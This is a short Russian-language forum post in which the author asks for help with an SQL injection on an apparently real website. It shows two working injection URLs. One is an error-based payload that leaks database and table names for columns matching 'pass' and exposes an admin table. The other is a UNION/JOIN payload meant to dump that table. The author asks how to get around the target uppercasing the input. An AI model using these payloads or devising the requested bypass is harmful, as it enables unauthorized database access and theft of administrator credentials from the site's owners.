Хелп! ...если это вообще возможно...
есть скуля:
/?id='')or+(select+count(*)+from+information_schema .tables+group+by+concat((select+(concat(table_sche ma,':',table_name))+from+information_schema.column s+where+column_name+like+'%pass%'+limit+0,1),floor (rand(0)*2)))+--+
имеем Duplicate entry 'a1323:tbladmin1' for key 1
база a1323, табла tbladmin
а тут:
/?id='')UNION+SELECT*from+(SELECT+*+FROM+tbladmin+J OIN+tbladmin+b)a+--+
выводит такую ошибку
Table 'a1323.TBLADMIN' doesn't exist
дело в том, что там id переводится в апперкейс.
возможно ли как-то с этим бороться? хексы, чары и прочие известные мне приблуды в FROM не годятся. значит должны быть НЕизвестные...
а? что скажете, господа
